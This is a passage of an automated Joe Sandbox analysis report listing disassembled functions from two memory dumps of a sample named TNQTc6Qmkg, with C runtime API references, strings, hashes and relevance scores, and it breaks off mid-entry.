_free.LIBCMT ref: 05D024B0
_free.LIBCMT ref: 05D024F2
_free.LIBCMT ref: 05D024FA
_free.LIBCMT ref: 05D02502
_free.LIBCMT ref: 05D0250A
_free.LIBCMT ref: 05D02518

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction ID: 4646411b47c9355e57773a2c27e91b673a604c5e507b188b104f7979222b66bd
Opcode Fuzzy Hash: 75a6b59b9c40cea0cceaa5b4972bf0a9586fa080860b27bf2b1171f59b09a734
Instruction Fuzzy Hash: 8CB1A075A012059FEB21DFB4C888BEEB7F5FF08300F14506EE995A7281DA75E945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00411F6A Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00411FDA
_free.LIBCMT ref: 00411FF0
_free.LIBCMT ref: 00412001
_free.LIBCMT ref: 00412012
_free.LIBCMT ref: 00412029
GetCPInfo.KERNEL32(?,?), ref: 00412071

Part of subcall function 0041B14E: _free.LIBCMT ref: 0041B1B9

_free.LIBCMT ref: 0041221D
_free.LIBCMT ref: 00412230
_free.LIBCMT ref: 0041223E
_free.LIBCMT ref: 00412249
_free.LIBCMT ref: 0041228B
_free.LIBCMT ref: 00412293
_free.LIBCMT ref: 0041229B
_free.LIBCMT ref: 004122A3
_free.LIBCMT ref: 004122B1

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction ID: 6ca6d0b646c7f0fe038b25a88f0b1b8239ef077873d54ac3d67d72be22f80314
Opcode Fuzzy Hash: 553da067019c13ab358a85b9588715c5e968bd6b03ba2638ba4cdb450481afc4
Instruction Fuzzy Hash: 40B1B071900309AFDB20DFA5C941BEEBBF5BF08304F14416EF959E7242D7B9A8918B64

Uniqueness

Uniqueness Score: -1.00%

Function 05D0F788 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 05D0F7CC

Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB38
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB4A
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB5C
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB6E
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB80
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EB92
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBA4
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBB6
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBC8
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBDA
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBEC
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EBFE
Part of subcall function 05D0EB1B: _free.LIBCMT ref: 05D0EC10

_free.LIBCMT ref: 05D0F7C1

Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529

_free.LIBCMT ref: 05D0F7E3
_free.LIBCMT ref: 05D0F7F8
_free.LIBCMT ref: 05D0F803
_free.LIBCMT ref: 05D0F825
_free.LIBCMT ref: 05D0F838
_free.LIBCMT ref: 05D0F846
_free.LIBCMT ref: 05D0F851
_free.LIBCMT ref: 05D0F889
_free.LIBCMT ref: 05D0F890
_free.LIBCMT ref: 05D0F8AD
_free.LIBCMT ref: 05D0F8C5

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: fb173fa6eb658efb6334086bc32f029ece7eec7fb585c7844ec6799c899741ce
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: 09313A71A047029FEB30AB79D888BAA77E9FF40310F24642BE459D61D4DF75E990C622

Uniqueness

Uniqueness Score: -1.00%

Function 0041F521 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041F565

Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8D1
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8E3
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E8F5
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E907
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E919
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E92B
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E93D
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E94F
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E961
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E973
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E985
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E997
Part of subcall function 0041E8B4: _free.LIBCMT ref: 0041E9A9

_free.LIBCMT ref: 0041F55A

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F57C
_free.LIBCMT ref: 0041F591
_free.LIBCMT ref: 0041F59C
_free.LIBCMT ref: 0041F5BE
_free.LIBCMT ref: 0041F5D1
_free.LIBCMT ref: 0041F5DF
_free.LIBCMT ref: 0041F5EA
_free.LIBCMT ref: 0041F622
_free.LIBCMT ref: 0041F629
_free.LIBCMT ref: 0041F646
_free.LIBCMT ref: 0041F65E

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction ID: 663e15b0dde773794ed22c5679a1a820cae4c96c2080e6077b97fe37dff8eac1
Opcode Fuzzy Hash: 433bf5766d187de3befac8d4d8ba4bb6dd22b8706a7933c0d1acaef10e60abec
Instruction Fuzzy Hash: D5316C71500300AFEB20AE7AE805B9773E9FF44318F11446BE849C7262DA79E8D68A18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E9B2 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041E9FA
_free.LIBCMT ref: 0041EA1E
_free.LIBCMT ref: 0041EA2B
_free.LIBCMT ref: 0041EA50
_free.LIBCMT ref: 0041EA5D
_free.LIBCMT ref: 0041EA66
_free.LIBCMT ref: 0041ED44
_free.LIBCMT ref: 0041ED4C

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction ID: 835e439df6746d9e4a645f0e3ab6fafaf2a1d36bb3e8ca10982b002e8b7a98f5
Opcode Fuzzy Hash: f7272d8640a351cb7ba9f4033a28a6de6cf5ddfcb3ed898df1b07d3bb18c3361
Instruction Fuzzy Hash: 12C15476D40204BBDB20DFA9CC43FDA77F8AF48744F15416AFE05EB282E67499818794

Uniqueness

Uniqueness Score: -1.00%

Function 00423226 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042422F), ref: 00423249

Strings

log10, xrefs: 00423293, 004232E3
asin, xrefs: 004233B5
acos, xrefs: 004233C1
log, xrefs: 004232EF, 004232FB
/BB, xrefs: 0042342E
exp, xrefs: 0042330E, 00423370
pow, xrefs: 0042332D, 004233D9, 004233EC
sqrt, xrefs: 004233CD

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: DecodePointer
String ID: /BB$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-1021189420
Opcode ID: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
Instruction ID: 713dac25a3a6b9e2a85c2ced730dd83283c3aaa7dc4d76372812c5e21a3eb3ad
Opcode Fuzzy Hash: bdce98cfa96bad54e0b597383ae5f841ffe0f48aba0a72e5dd8a679a579e2192
Instruction Fuzzy Hash: C2514F71B00529CBDB10DF58F9485ADBBB0FF49315FE041A6D881A6264CB7D8B2AC72D

Uniqueness

Uniqueness Score: -1.00%

Function 05D06E8C Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05D06EA0

Part of subcall function 05D06501: HeapFree.KERNEL32(00000000,00000000,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?), ref: 05D06517
Part of subcall function 05D06501: GetLastError.KERNEL32(?,?,05D0F288,?,00000000,?,00000000,?,05D0F52C,?,00000007,?,?,05D0F920,?,?), ref: 05D06529

_free.LIBCMT ref: 05D06EAC
_free.LIBCMT ref: 05D06EB7
_free.LIBCMT ref: 05D06EC2
_free.LIBCMT ref: 05D06ECD
_free.LIBCMT ref: 05D06ED8
_free.LIBCMT ref: 05D06EE3
_free.LIBCMT ref: 05D06EEE
_free.LIBCMT ref: 05D06EF9
_free.LIBCMT ref: 05D06F07

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: 9c57deb867c65d253e6593992eb9406f34c80ada8bab5f8c52bbf359bde78e0b
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: 0111CB75200508BFDB11EF95C848EDD3B65EF04354B4154A6F9088F2B9DA32EE60DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416C25 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416C39

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 00416C45
_free.LIBCMT ref: 00416C50
_free.LIBCMT ref: 00416C5B
_free.LIBCMT ref: 00416C66
_free.LIBCMT ref: 00416C71
_free.LIBCMT ref: 00416C7C
_free.LIBCMT ref: 00416C87
_free.LIBCMT ref: 00416C92
_free.LIBCMT ref: 00416CA0

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction ID: bc4a8488de18622ef43ac097d779123cba2550ccea22c0c0e46fff27a6ede036
Opcode Fuzzy Hash: 7e08463fe454a3efb13b0bae982afa11f0016e82d7eaa394236c4ad25814e345
Instruction Fuzzy Hash: B611BC75100118BFDF01FF95D952DD93B65EF48358B42849AFD084F122D635EE919B44

Uniqueness

Uniqueness Score: -1.00%

Function 05CF1417 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 05CF141C
std::_Lockit::_Lockit.LIBCPMT ref: 05CF142E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 05CF146B

Part of subcall function 05CF80E1: _Yarn.LIBCPMT ref: 05CF8100
Part of subcall function 05CF80E1: _Yarn.LIBCPMT ref: 05CF8124

std::bad_exception::bad_exception.LIBCMT ref: 05CF148C
__CxxThrowException@8.LIBVCRUNTIME ref: 05CF149A
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 05CF14BD
std::_Lockit::~_Lockit.LIBCPMT ref: 05CF152E

Strings

n~B, xrefs: 05CF1417

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: n~B
API String ID: 835844855-2489732092
Opcode ID: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction ID: 09af9737e79d3a41249d4e2c453d33ee6782ce30872a49d154a186a367e9b370
Opcode Fuzzy Hash: 64c16167f489f4d77b397d7091ed6621fbd9ca3405d2a72e65d09ca87552aa99
Instruction Fuzzy Hash: 27319F72905B40EFC7319F29E84465AFBF5FF48710B548A2FE19A92A80C734A601CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004011B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004011B5
std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204

Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD

std::bad_exception::bad_exception.LIBCMT ref: 00401225
__CxxThrowException@8.LIBVCRUNTIME ref: 00401233
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7

Strings

bad locale name, xrefs: 0040121D

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 835844855-1405518554
Opcode ID: 18baea1ba75347acc1cbce090f57c78de98d7f253c80eba5839dc4d456aea96c
Instruction ID: 0603089b66b0b819d6eff5d75331a99d5985645afad82bc6fef42f715fc6e5ae
Opcode Fuzzy Hash: 18baea1ba75347acc1cbce090f57c78de98d7f253c80eba5839dc4d456aea96c
Instruction Fuzzy Hash: E0319131904B40DEC7319F6AD941A5BFBF0BF08710B508A7FE05AA3A91C738B904CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05D09514 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction ID: a6fed0b992a7b2dfc1d4090394881f379ddd8a729e02ed4252f974a7ad05afa9
Opcode Fuzzy Hash: f1502d6197d2a0b4b305fcae2024c2ce003ecf790107f78a60311c4aa9610d50
Instruction Fuzzy Hash: 44C1C075E04249ABDF11DFA8C8A8BADBBB1FF49310F085096E541A73D2C770D941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 05D04CB1 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

_memcmp.LIBVCRUNTIME ref: 05D04F5B
_free.LIBCMT ref: 05D04FCC
_free.LIBCMT ref: 05D04FE5
_free.LIBCMT ref: 05D05017
_free.LIBCMT ref: 05D05020
_free.LIBCMT ref: 05D0502C

Strings

C, xrefs: 05D04E19

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction ID: 16450180348fb7425e5822945564c0e9a4022724ed19e72ea006885279821f0f
Opcode Fuzzy Hash: 8da020f59b73da55e944a716f6406de2f80b35aa4703f2a4fd96452cb970ac71
Instruction Fuzzy Hash: 2BB12775A012199FDB24DF18C888FADB7B5FF48304F5045AADA49A7394D731AE90CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

_memcmp.LIBVCRUNTIME ref: 00414CF4
_free.LIBCMT ref: 00414D65
_free.LIBCMT ref: 00414D7E
_free.LIBCMT ref: 00414DB0
_free.LIBCMT ref: 00414DB9
_free.LIBCMT ref: 00414DC5

Strings

C, xrefs: 00414BB2

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction ID: f1eb2fe4340e97ed79650f57c8a8747809c023f352878a21904a4d61aa040acb
Opcode Fuzzy Hash: e89ccd2a3967dbde377b9359045f7db90b46cd3f4383fc33eaa8f2e05e3481b2
Instruction Fuzzy Hash: B7B12975A012199BDB24DF18D884BEEB7B4FF88304F5045AAE849A7350E735AED1CF48

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Strings

B, xrefs: 0041461F
|B, xrefs: 004146B1

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: B$|B
API String ID: 3033488037-200315465
Opcode ID: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction ID: bceed09af247e51911f2c06e24e965b8c83290834e1de00ea3c3fe4b0a612a45
Opcode Fuzzy Hash: 0551716ea73a6ef0ea3937d8a9b0131bc722ba02b4a1552fb15e10019e7b872c
Instruction Fuzzy Hash: F351E631A00304AFDB20DF66D841BAA77F4EF99728F14056EE849DB690E739DD81CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
__alloca_probe_16.LIBCMT ref: 004167D1
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
__alloca_probe_16.LIBCMT ref: 004168B6
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
__freea.LIBCMT ref: 00416926

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

__freea.LIBCMT ref: 0041692F
__freea.LIBCMT ref: 00416954

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction ID: 945c2db0b5faf58cb0d9801c543b0b3226d139e5166d8e9d93898d86eb794442
Opcode Fuzzy Hash: 6d456281acf0619f27023182ced17daa6554775fa394724c4215adca619d4e4e
Instruction Fuzzy Hash: 2B51E6B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFC04D6280DB38DC90C668

Uniqueness

Uniqueness Score: -1.00%

Function 05D0F03E Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05D0F0AD
_free.LIBCMT ref: 05D0F0BB
_free.LIBCMT ref: 05D0F1E9
_free.LIBCMT ref: 05D0F1F4

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction ID: d66ee261eb0c5bc6011ac711a96a9ba5dbe4f34bb1de012ab7fd93120022195d
Opcode Fuzzy Hash: b86ba08727650023ed19c92e77eeb825199b3895615cbf632ae48cc155c5a0ec
Instruction Fuzzy Hash: 24619275E04206AFEB30DFA4C844BAEBBF5FB44710F24516BD944EB2C5DA70A941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDD7 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EE46
_free.LIBCMT ref: 0041EE54
_free.LIBCMT ref: 0041EF82
_free.LIBCMT ref: 0041EF8D

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction ID: e986a1f43705154f11102f288933750ce46d6c5c7240a2201f23140d39e68ccb
Opcode Fuzzy Hash: 5e932ea9069c118bb961e6d76857f0c9b8f4ba2cd0390af678983e5fd13f1dd1
Instruction Fuzzy Hash: 6761A076904305AFDB20DF66C842BDABBF4EF48710F1441ABEC44EB281D7749D828B98

Uniqueness

Uniqueness Score: -1.00%

Function 05D04833 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 05D07CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05D07CDE

_free.LIBCMT ref: 05D0493E
_free.LIBCMT ref: 05D04955
_free.LIBCMT ref: 05D04974
_free.LIBCMT ref: 05D0498F
_free.LIBCMT ref: 05D049A6

Strings

B, xrefs: 05D04886

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID: B
API String ID: 3033488037-2386870291
Opcode ID: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction ID: 96582530853469d813a57036bf222f960603bdacdc7612911d6c744486874e80
Opcode Fuzzy Hash: e2765243d4b407044065e09a93470513da81931724dfe5683d741b61e3df85b4
Instruction Fuzzy Hash: CF51AE32A00604ABDF20DF69DC40F6A77F5FF48720B14556EEA4ADB290E731EA11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05D05C7A Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,05D063EF,?,?,?,?,?,?), ref: 05D05CBC
__fassign.LIBCMT ref: 05D05D37
__fassign.LIBCMT ref: 05D05D52
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 05D05D78
WriteFile.KERNEL32(?,?,00000000,05D063EF,00000000,?,?,?,?,?,?,?,?,?,05D063EF,?), ref: 05D05D97
WriteFile.KERNEL32(?,?,00000001,05D063EF,00000000,?,?,?,?,?,?,?,?,?,05D063EF,?), ref: 05D05DD0

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction ID: 1bfe2ec98d1f00eb3e3f0917ab3ae26a886bf213686fc30f473db2fe4bffe519
Opcode Fuzzy Hash: 4f4f63612dd6758aa9e7fecd2cbe65b3dc713529ec1a556737616ebe55c1ece4
Instruction Fuzzy Hash: 5C518171A00249AFDB20CFA8D885BEEBBF4EF09310F14516BE995E7291D7309951CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
__fassign.LIBCMT ref: 00415AD0
__fassign.LIBCMT ref: 00415AEB
